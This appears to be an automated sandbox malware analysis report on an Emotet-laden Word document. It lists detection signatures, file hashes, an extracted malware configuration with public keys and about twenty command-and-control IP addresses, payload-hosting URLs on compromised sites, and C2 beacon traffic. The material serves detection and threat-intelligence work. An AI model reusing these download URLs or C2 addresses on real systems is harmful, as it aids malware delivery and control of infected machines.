Windows Analysis Report 1711.doc

Overview

General Information

Sample Name:	1711.doc
Analysis ID:	526179
MD5:	85ab297345c97bca1a5004dc537f6c1c
SHA1:	0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256:	31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Powershell drops PE file

Tries to detect virtualization through RDTSC time measurements

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document contains an embedded VBA macro which may execute processes

Sigma detected: Microsoft Office Product Spawning Windows Shell

Changes security center settings (notifications, updates, antivirus, firewall)

Suspicious powershell command line found

Obfuscated command line found

C2 URLs / IPs found in malware configuration

Drops PE files to the application program directory (C:\ProgramData)

Document has an unknown application name

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Document contains an embedded VBA macro which executes code when the document is opened / closed

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Document contains no OLE stream with summary information

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Document contains embedded VBA macros

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Potential document exploit detected (performs HTTP gets)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: https://staviancjs.com/wp-forum/QOm4n2/	Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split	Avira URL Cloud: Label: malware
Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 21.2.rundll32.exe.30146b8.1.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Source: 1711.doc	Virustotal: Detection: 39%	Perma Link
Source: 1711.doc	Metadefender: Detection: 20%	Perma Link
Source: 1711.doc	ReversingLabs: Detection: 57%

Multi AV Scanner detection for domain / URL

Source: alfaofarms.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\13791789.dll	Metadefender: Detection: 34%	Perma Link
Source: C:\ProgramData\13791789.dll	ReversingLabs: Detection: 81%
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	Metadefender: Detection: 34%	Perma Link
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	ReversingLabs: Detection: 81%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615CD1EE FindFirstFileExA,

14_2_615CD1EE

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.5:49752 -> 72.167.40.83:80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: thepilatesstudionj.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.5:49794 -> 51.178.61.60:443

Source: winword.exe

Memory has grown: Private usage: 0MB later: 76MB

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49796 -> 45.79.33.48:8080

Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
Source: powershell.exe, 00000005.00000002.339928145.0000000004958000.00000004.00000001.sdmp	String found in binary or memory: http://alfaofarms.com4
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000003.511663984.0000000003096000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.309254161.0000000007861000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000005.00000003.306337007.0000000007819000.00000004.00000001.sdmp	String found in binary or memory: http://crl.verisign.
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/9aTcv/.Split.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/In
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Tcv/.Splitplit0.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngp
Source: powershell.exe, 00000005.00000002.339588827.0000000004711000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.co
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com
Source: powershell.exe, 00000005.00000002.343856415.0000000004E23000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-conte
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5U
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp	String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCK
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/563209-4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/W
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/h
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://168.197.250.1480/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://168.197.250.14:80/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/y
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48/a
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48/s
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/0
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/2
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48:8080/a
Source: rundll32.exe, 00000015.00000002.535047185.0000000002FF0000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVo
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoU
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoryptography
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVou/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/E
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.entity.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cr.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
